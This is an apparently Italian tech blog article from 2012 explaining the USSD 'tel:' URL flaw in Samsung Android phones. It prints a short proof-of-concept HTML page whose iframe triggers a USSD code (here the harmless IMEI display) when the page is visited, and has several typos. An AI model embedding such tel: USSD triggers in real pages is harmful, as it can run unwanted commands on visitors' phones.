Elenco codici USSD: Smartphone Samsung android
14 novembre 2012
Rimedi codice malevolo USSD: smartphone android samsung
19 novembre 2012

USSD, codice malevolo per eseguire comandi: smartphone android samsung

USSD, codice malevolo per eseguire comandi: smartphone android samsung

Scoperta una FALLA IN ANDROID grazie alla qua le a possibile “comandare da remoto” uno smartphone. Come? Basta navigare su un SITO MALEVOLO…

IL CODICE “MALEVOLO” Arriviamo, finalmente, al nocciolo della questione: come e possibile che una qualunque pagina Web possa far eseguire ad un dispositivo mobile un codice USSD? Date un’occhiata al seguente codice HTML:

<html>

<head>

<title>Prova Exploil USSD</title>

</head>

<body>

Se il tuo telefono a affetto dalla vulnerability dell’attacco del protocollo “tel:”, questa pagina awiery il dialer e visualizzerà il suo codice IMEI

<iframe src=”tel:*%2306%23″ />

</body>

</html>

Il “trucco” (o bug, che dir si voglia) a tutto nel codice src richiamato nel TAG iframe.

Sfruttando l’URL SCHEMA del protocollo tel, la pagina HTML esegue il codice USSD specificato nel sorgente dell’iframe. Nel codice riportato come esempio, il testo “%23” rappresenta il cancelletto (#) utilizzato negli USSD.

In questo caso abbiamo riportato il codice *#06#, che visualizza l’IMEI del cellulare.

Falla sicurezza: smartphone android Samsung

Il nostro Voto
Ti è piaciuto l'articolo?
[Media: 0]

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *

Time limit is exhausted. Please reload the CAPTCHA.